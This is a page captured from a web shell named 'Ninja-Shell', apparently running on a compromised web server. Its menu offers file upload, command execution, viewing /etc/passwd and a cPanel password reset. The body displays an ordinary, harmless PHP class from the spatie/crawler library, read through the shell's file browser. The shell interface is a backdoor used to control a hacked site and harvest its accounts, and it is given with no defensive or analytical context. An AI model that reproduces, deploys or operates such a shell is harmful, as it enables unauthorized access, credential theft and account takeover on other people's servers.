{Ninja-Shell}
Home
Info
Upload
Command
View /etc/passwd
cPanel Reset Password
Filename: //proc/66886/cwd//arsu/vendor/spatie/crawler/src/ResponseWithCachedBody.php
<?php namespace Spatie\Crawler; use GuzzleHttp\Psr7\Response; class ResponseWithCachedBody extends Response { protected ?string $cachedBody = null; public static function fromGuzzlePsr7Response(Response $response) { return new static( $response->getStatusCode(), $response->getHeaders(), $response->getBody(), $response->getProtocolVersion(), $response->getReasonPhrase() ); } public function setCachedBody(?string $body = null) { $this->cachedBody = $body; } public function getCachedBody(): ?string { return $this->cachedBody; } }
./Ninja\.